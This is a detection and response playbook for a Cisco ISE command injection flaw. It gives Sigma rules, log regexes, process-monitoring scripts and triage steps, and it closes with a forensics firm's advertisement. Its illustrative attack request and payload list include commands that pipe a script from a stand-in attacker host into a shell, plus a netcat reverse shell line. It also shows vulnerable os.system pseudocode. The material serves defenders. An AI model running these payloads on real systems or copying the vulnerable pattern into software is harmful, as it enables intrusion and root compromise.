CVE-2026-20147: Cisco ISE Command Injection Detection and Response Playbook

CVE-2026-20147 is an authenticated OS command injection (CWE-78) in Cisco ISE and ISE-PIC that grants root-level remote code execution via the admin web interface. Any admin role can exploit it, including read-only. CVSS 9.9 Critical. This playbook provides Sigma rules, IOC hunt lists and triage commands for detection and response teams.

TL;DR

  • RCE, not DoS. This is an authenticated command injection that drops you to root on the underlying OS. The denial-of-service angle in single-node deployments is a secondary effect. The primary impact is full system compromise.
  • Auth required, but READ-ONLY admin is enough. Any valid admin session token works. The low-privilege monitoring account your SOC team uses to check ISE dashboards is sufficient to exploit this vulnerability.
  • Patch immediately. CVSS 9.9. If you run Cisco ISE and have not patched, stop reading and patch first. Then come back for detection.

What It Is

CVE-2026-20147 is a CWE-78 OS Command Injection in the Cisco ISE and Cisco ISE-PIC admin web interface. The vulnerability exists in an HTTP endpoint accessible to authenticated administrators. Because the application fails to sanitize user-supplied input before passing it to an operating system shell, an attacker with any admin-level credential can inject arbitrary OS commands. Those commands execute as root. There is no privilege escalation chain required. The injected command runs with the highest privileges on the appliance from the first request. The NVD entry assigns a CVSS base score of 9.9 (Critical). In single-node ISE deployments, exploitation can also render the node unavailable, creating a secondary denial-of-service condition that prevents new endpoint authentication until the node is restored.

CVE Identifier: CVE-2026-20147
CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command
CVSS Base Score: 9.9 / 10.0 (CRITICAL)
Published: 2026-04-15T17:17:02.410
Attack Vector: Network (authenticated, any admin role)

Why "Read-Only Admin Counts" Matters

Most organizations treat read-only admin accounts as low-risk. They exist for monitoring dashboards, pulling reports and checking node health. Security teams hand them out freely because the assumption is straightforward: read-only means the account cannot change anything. That assumption is wrong here.

CVE-2026-20147 does not require write privileges within the ISE application. It requires a valid admin session. The vulnerable HTTP endpoint processes the request before the application-layer authorization check distinguishes between admin roles. Any admin session cookie works. A read-only admin session. A full admin session. A super-admin session. The injection point does not care about the role attached to the credential.

If an attacker compromises ANY admin credential, even the monitoring-only account your SOC team uses, they own the box.

This matters because read-only accounts are often protected with weaker controls than full admin accounts. They get shared across teams. They get excluded from MFA requirements. They get stored in shared password managers without rotation policies. They get used from jump boxes that are not hardened. In environments with distributed admin access across multiple ISE deployment nodes, the attack surface is broader than the CVSS score implies. Every read-only account is a viable entry point. Audit every admin account on every ISE node, not just the super-admin credentials.

Practical steps: inventory every ISE admin account across all nodes. Determine which accounts have active sessions. Rotate credentials on all of them. Enable MFA for every admin tier, including read-only. If you cannot confirm that no read-only credential was compromised, treat the node as potentially exploited and follow the triage process in Section 6, "What to Do If You Think You're Hit".

What Attack Traffic Looks Like

Disclaimer: The following patterns are illustrative and sanitized. They demonstrate the vulnerability class (CWE-78) for defensive purposes. This is NOT a working exploit. Endpoint names are redacted. Payloads are generic metacharacter examples that apply to any OS command injection vulnerability.

The attack targets an administrative API endpoint on the ISE web interface. The attacker needs a valid session (cookie and CSRF token) and submits a POST request where one of the parameter values contains shell metacharacters. The server-side code passes that parameter value to an OS command without sanitization.

Illustrative HTTP request:

POST /admin/API/<redacted-endpoint> HTTP/1.1
Host: ise.victim.local
Cookie: JSESSIONIDSSO=<valid-admin-session>
X-CSRF-Token: <valid>
Content-Type: application/x-www-form-urlencoded

name=node01;curl%20http://attacker.example/x.sh|bash%20%23

In this example, the name parameter is expected to contain a node identifier. The attacker appends a semicolon to terminate the legitimate command, then injects a curl pipeline that downloads and executes a remote script. The %23 (#) comments out whatever the application appends after the parameter value.

Illustrative pseudocode (NOT actual Cisco code):

# BAD: user input flows directly to shell
import os
name = request.form.get("name")
os.system(f"/opt/CSCOcpm/bin/some-tool --target {name}")

# What the OS actually executes:
# /opt/CSCOcpm/bin/some-tool --target node01;curl http://attacker.example/x.sh|bash #

The semicolon terminates the first command. Everything after it runs as a separate command with the same privileges as the parent process, which in ISE's case is root.
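A hardened counterpart to the pseudocode above, added here as an example (not Cisco code): the node name is checked against an allowlist pattern and the tool is invoked as an argv list with no shell, so the injected value from the request above is rejected before anything runs and, even if validation were bypassed, would reach the tool as one literal argument. The allowlist pattern is an assumption; the tool path is the placeholder from the pseudocode.

```python
import re
import subprocess

# Two independent controls: a strict allowlist on the node name, and
# argv-style execution so no shell ever parses the value.
NODE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,62}$")  # assumed name format
TOOL = "/opt/CSCOcpm/bin/some-tool"  # placeholder path from the pseudocode above


def validate_node_name(name):
    """Return the name if it matches the allowlist, else raise ValueError."""
    if not NODE_NAME.fullmatch(name or ""):
        raise ValueError(f"invalid node name: {name!r}")
    return name


def build_argv(name, tool=TOOL):
    """argv list for the tool; a rejected name never reaches this point."""
    return [tool, "--target", validate_node_name(name)]


def run_tool(name, tool=TOOL):
    """Run the tool without a shell. Because no shell is involved, ';', '|'
    and '$(' in the argument are plain characters, not command separators."""
    return subprocess.run(build_argv(name, tool), shell=False,
                          capture_output=True, text=True, timeout=30)
```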

Generic metacharacter payloads to hunt for in logs:

value;id > /tmp/proof
value && /usr/bin/curl -s http://attacker/x.sh | sh
value | nc attacker 4444 -e /bin/sh
value`id`
value$(id)
value%0aid          # newline injection

URL-encoded equivalents that will appear in access logs:

Character   URL-encoded       Purpose
;           %3B               Command separator
|           %7C               Pipe to second command
&&          %26%26            Conditional execution
$()         %24%28 ... %29    Command substitution
`           %60               Backtick command substitution
newline     %0a               Newline injection

Any of these characters appearing in ISE admin API request parameters should be treated as suspicious. Legitimate ISE admin operations do not include shell metacharacters in node names, group names or configuration values.

How to Detect It

Detection for CVE-2026-20147 operates at four layers: web request analysis via Sigma rules, log review via regex, process anomaly detection on the ISE appliance and IOC hunting across the network. Deploy all four. No single layer catches everything.

5a. Sigma Rule

This Sigma rule detects HTTP requests to ISE admin API endpoints containing shell metacharacters. Deploy it in your SIEM against ISE web access logs, reverse proxy logs or WAF logs that capture ISE admin traffic.

title: Cisco ISE Admin API - Shell Metacharacters in Parameter
id: 8a2c1f4a-1b2c-4d5e-9f01-0123456789ab   # placeholder UUID; generate your own before deploying
status: experimental
description: >
  Detects POST/GET to ISE admin API containing shell metacharacters
  in parameters, indicative of CVE-2026-20147 exploitation attempts.
tags:
  - attack.initial_access
  - attack.t1190
  - attack.execution
  - attack.t1059
logsource:
  product: cisco_ise
  service: admin_webui
detection:
  selection_path:
    cs-uri-stem|contains:
      - '/admin/API/'
      - '/admin/rs/'
  # (?i) so %3b/%3B, %0a/%0A etc. match regardless of how the client encoded them
  selection_payload:
    cs-uri-query|re: '(?i)(%3B|%7C|%26%26|%60|%24%28|%0A|;|\||&&|`|\$\()'
  selection_post_body:
    cs-post-body|re: '(?i)(%3B|%7C|%26%26|%60|%24%28|%0A|;|\||&&|`|\$\()'
  condition: selection_path and (selection_payload or selection_post_body)
fields:
  - cs-username
  - c-ip
  - cs-uri-stem
  - cs-uri-query
falsepositives:
  - Unlikely; legitimate admin API requests do not carry shell metacharacters in parameter values
level: high

Deployment notes: The rule assumes your log source captures the full URI query string and POST body. If your reverse proxy or WAF truncates POST bodies, you lose visibility on the selection_post_body condition. Confirm your logging infrastructure captures full request parameters before relying on this rule alone. If you forward ISE admin logs to Splunk, Elastic or Microsoft Sentinel, convert this Sigma rule using the sigma-cli tool for your backend.

5b. Regex for Log Review

If you do not have a Sigma-compatible SIEM or need to run a quick manual hunt across raw log files, use this regex pattern against ISE admin access logs:

(?i)(/admin/(api|rs)/)[^\s]*?(%3b|%7c|%26%26|%60|%24%28|%0a|[;|`]|\$\()

This pattern matches any request to /admin/API/ or /admin/rs/ paths that contains shell metacharacters in either raw or URL-encoded form. Run it with grep -P or your preferred regex engine against web server access logs, ISE admin audit logs and any WAF or reverse proxy logs that sit in front of the ISE admin interface.

Example usage:

grep -Pi '(/admin/(api|rs)/)[^\s]*?(%3b|%7c|%26%26|%60|%24%28|%0a|[;|`]|\$\()' \
  /opt/CSCOcpm/logs/admin/admin-access.log

Any match warrants immediate investigation. False positives from this pattern are rare because legitimate admin API requests do not contain semicolons, pipes or backticks in parameter values.
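As an added example (not code from the original playbook), the same metacharacter check the Sigma rule in 5a and the grep pattern in 5b apply, run in Python over a few constructed log lines. Each field is percent-decoded before matching, so the raw and encoded forms in the table above collapse into one pattern. The log layout, field names and sample requests are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Admin API paths and shell metacharacters from the playbook's Sigma rule and
# grep pattern. Fields are percent-decoded before matching, so the raw and
# URL-encoded forms from the table above collapse into one pattern.
ADMIN_PATH = re.compile(r"^/admin/(?:API|rs)/", re.IGNORECASE)
SHELL_META = re.compile(r";|\||&&|`|\$\(|\n")

# Assumed log layout, constructed for this example (not a real ISE format):
# timestamp cs-username c-ip cs-method cs-uri-stem cs-uri-query cs-post-body
FIELDS = ("ts", "user", "ip", "method", "path", "query", "body")

def parse_line(line):
    """Split one log line into a dict, or return None if it is malformed."""
    parts = line.rstrip("\n").split(" ", len(FIELDS) - 1)
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def check_field(raw):
    """Return (decoded_value, metacharacter) if the field carries one, else None."""
    if raw in ("", "-"):          # "-" is the empty-field marker in the sample log
        return None
    decoded = unquote_plus(raw)
    m = SHELL_META.search(decoded)
    return (decoded, m.group(0)) if m else None

def scan(lines):
    """One finding per admin API request whose query or body holds a metacharacter."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None or not ADMIN_PATH.match(rec["path"]):
            continue              # not an admin API request: outside this rule's scope
        for field in ("query", "body"):
            hit = check_field(rec[field])
            if hit:
                findings.append({"line": n, "user": rec["user"], "ip": rec["ip"],
                                 "path": rec["path"], "field": field,
                                 "value": hit[0], "meta": hit[1]})
    return findings

# Constructed sample lines: a benign request, two shaped like the playbook's
# payloads, and a metacharacter outside the admin API that must not fire.
SAMPLE_LOG = [
    "2026-04-16T10:02:11Z admin1 10.0.0.5 POST /admin/API/node - name=node01",
    "2026-04-16T10:03:44Z ro-monitor 10.0.0.77 POST /admin/API/node - "
    "name=node01%3Bcurl%20http%3A%2F%2Fattacker.example%2Fx.sh%7Cbash%20%23",
    "2026-04-16T10:04:01Z admin1 10.0.0.5 GET /admin/rs/status id=node01%24%28id%29 -",
    "2026-04-16T10:05:20Z admin1 10.0.0.5 GET /portal/login msg=hello%7Cworld -",
]
```

Calling scan(SAMPLE_LOG) reports the read-only account's POST and the $() query, and stays silent on the benign request and on the pipe outside the admin API.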

5c. Process Anomaly Detection

Command injection means the attacker's payload runs as a child process of the ISE application server. ISE runs on a Java/Tomcat stack under the CSCOcpm service. Under normal operation, this process does not spawn interactive shells or network utilities.

Watch for these child-process relationships:

parent: java (CSCOcpm)
child:  /usr/bin/curl | /usr/bin/wget | /bin/nc | /bin/bash -c | /bin/sh -c | /usr/bin/python -c

On Linux-based ISE appliances, you can detect this with auditd rules, EDR process telemetry or a simple process monitoring script. If your organization uses CrowdStrike, SentinelOne, Carbon Black or Microsoft Defender for Endpoint on the ISE node (where supported), create a detection rule that alerts when the Java process spawns any of these binaries.

For auditd, note that audit rules cannot express "descends from the CSCOcpm process": there is no ancestor filter, and -F ppid= only matches one fixed PID. Record every execve and resolve the parent relationship at analysis time instead:

# Add to /etc/audit/rules.d/ise-command-injection.rules
# auditd has no process-ancestry filter, so log every execve (both ABIs) and
# filter on ppid/comm afterwards, e.g. ausearch -k ise_cmd_injection
-a always,exit -F arch=b64 -S execve -k ise_cmd_injection
-a always,exit -F arch=b32 -S execve -k ise_cmd_injection

Any process spawn from the Tomcat/Java process tree that includes curl, wget, nc, ncat, bash -c, sh -c, python -c or perl -e is a confirmed indicator of exploitation. There is no legitimate operational reason for the ISE web application to shell out to these utilities in response to an admin API request.
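An added example of the "simple process monitoring script" this section mentions (not code from the playbook or from Cisco): it reads a ps snapshot, locates the ISE application server by an assumed marker (a java process whose command line mentions CSCOcpm) and reports watched binaries anywhere beneath it, which is the ancestry check auditd itself cannot perform. The process list is constructed for the example.

```python
# Binaries the playbook says the ISE application server never legitimately
# spawns: shells and network tools by name, interpreters only with an inline-code flag.
WATCH = {"curl", "wget", "nc", "ncat", "bash", "sh"}
WATCH_WITH_FLAG = {("python", "-c"), ("perl", "-e")}

def parse_ps(text):
    """`ps -eo pid,ppid,comm,args` output -> {pid: (ppid, comm, args)}."""
    rows = (line.split(None, 3) for line in text.strip().splitlines()[1:])
    return {int(p): (int(pp), c, a) for p, pp, c, a in rows}

def descends_from_ise(pid, procs):
    """Walk ppid links upward; True if an ancestor is the ISE java server.
    Assumption: that server is a java process whose args mention CSCOcpm."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, comm, args = procs[pid]
        if comm == "java" and "CSCOcpm" in args:
            return True
        pid = ppid
    return False

def watched(comm, args):
    """Name (or name + flag) if the process is on the watch list, else None."""
    argv = args.split()
    name = argv[0].rsplit("/", 1)[-1] if argv else comm
    name = name.rstrip("0123456789.")                 # python3.9 -> python
    if name in WATCH:
        return name
    if len(argv) > 1 and (name, argv[1]) in WATCH_WITH_FLAG:
        return f"{name} {argv[1]}"
    return None

def find_suspicious(procs):
    """[(pid, reason, args)] for watched binaries anywhere under the ISE tree."""
    return [(pid, watched(comm, args), args)
            for pid, (ppid, comm, args) in sorted(procs.items())
            if watched(comm, args) and descends_from_ise(ppid, procs)]

# Constructed snapshot: an injected `sh -c` under the java server with its curl
# and bash children, plus an admin's own curl over SSH that must not fire.
SAMPLE_PS = """\
  PID  PPID COMMAND         COMMAND
 1450     1 java            /usr/bin/java -Djava.home=/opt/CSCOcpm/jre org.apache.catalina.startup.Bootstrap start
 2301  1450 sh              /bin/sh -c /opt/CSCOcpm/bin/some-tool --target node01;curl http://attacker.example/x.sh|bash #
 2302  2301 curl            curl http://attacker.example/x.sh
 2303  2301 bash            bash
 3900   812 bash            -bash
 3915  3900 curl            curl -s https://updates.example/check
"""
```

find_suspicious(parse_ps(SAMPLE_PS)) returns the sh, curl and bash processes under PID 1450 and ignores the curl run from the SSH session.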

5d. IOC Hunt List

Beyond real-time detection, run these hunts across your environment to identify post-exploitation activity:

  • Outbound HTTP/HTTPS from ISE management IP to non-Cisco destinations. The ISE management interface should only communicate with Cisco update servers, your SIEM/syslog collectors and configured RADIUS/TACACS clients. Any outbound HTTP to an unrecognized IP or domain is suspicious.
  • New files in /tmp, /var/tmp, /opt/CSCOcpm/temp/ not owned by the cpm user. Exploitation typically drops payloads or staging scripts into world-writable directories. Check file ownership, creation timestamps and contents.
  • Unexpected SSH keys in ~root/.ssh/authorized_keys. Persistence via SSH key injection is a standard post-exploitation technique. Compare the current authorized_keys file against your known-good baseline.
  • New local OS accounts in /etc/passwd. Any user account that was not provisioned through your change management process warrants immediate investigation.
  • New ISE admin accounts created outside change windows. Check the ISE admin audit trail for account creation events. Correlate timestamps against your change calendar.
  • Audit trail gaps in /opt/CSCOcpm/logs/localStore/. Attackers who gain root access often clear or truncate log files to cover their tracks. Gaps in the log timeline or files with suspiciously recent modification timestamps relative to their expected log rotation schedule indicate tampering.

Run these hunts on every ISE node in your deployment. In distributed deployments with multiple Policy Administration Nodes (PANs) and Policy Service Nodes (PSNs), an attacker who compromises one node can use ISE's built-in replication and trust relationships to move laterally to other nodes.

What to Do If You Think You're Hit

If any of the detection methods above return positive results, or if you have reason to believe a Cisco ISE admin credential was compromised, collect forensic artifacts before taking any destructive action. Do not reboot the node. Do not reinstall. Do not "clean up" suspicious files. Preserve everything first.

Run this triage collection script as an admin user on the affected ISE node:

tar czf /tmp/ise-triage-$(hostname)-$(date +%s).tgz \
  /opt/CSCOcpm/logs/localStore \
  /opt/CSCOcpm/logs/admin \
  /var/log/messages /var/log/secure \
  /etc/passwd /etc/shadow \
  /root/.bash_history \
  /home/*/.bash_history 2>/dev/null

This collects ISE application logs, OS authentication logs, user account files and shell history files into a single compressed archive. The 2>/dev/null suppresses errors for files that may not exist on your specific ISE version. Reading /etc/shadow and /root/.bash_history requires root, so an unprivileged shell will silently miss them. The archive lands in /tmp, one of the directories the 5d hunts examine, so note its name and timestamp before you run those hunts, and record a SHA-256 hash of the archive on the node before copying it off so the evidence copy can be verified later.

After collection:

  1. Copy the triage archive off the ISE node to a forensic workstation or secure evidence store. Do not analyze artifacts on the compromised system.
  2. Capture a full disk image if your incident response process requires it. The triage archive above covers the most time-sensitive artifacts, but a disk image preserves deleted files and filesystem metadata that may be relevant.
  3. Rotate every admin credential on every ISE node in the deployment. Do this from a trusted workstation, not from the ISE admin interface on the potentially compromised node.
  4. Check for lateral movement. Review authentication logs on systems that trust the ISE node: RADIUS clients, TACACS+ clients, Active Directory or LDAP servers that ISE authenticates against.
  5. Patch the affected node before returning it to production. If you cannot confirm the node is clean, rebuild it from a known-good image and restore configuration from backup.

If you need help analyzing these artifacts, call Sherlock Forensics at 604.229.1994. We maintain Cisco ISE forensic imaging and analysis capabilities and can turn around an initial assessment within 24 hours of receiving artifacts.

Patch and References

Patch availability and fixed versions are documented in the Cisco Security Advisory. Do not rely solely on this playbook for patch guidance. Check the vendor advisory directly for the authoritative list of fixed releases.

Sherlock Forensics provides Cisco ISE security assessments and incident response for organizations that run ISE in production. If you need an independent assessment of your ISE deployment's exposure to CVE-2026-20147, or if you need forensic analysis of a suspected compromise, contact our team or call 604.229.1994.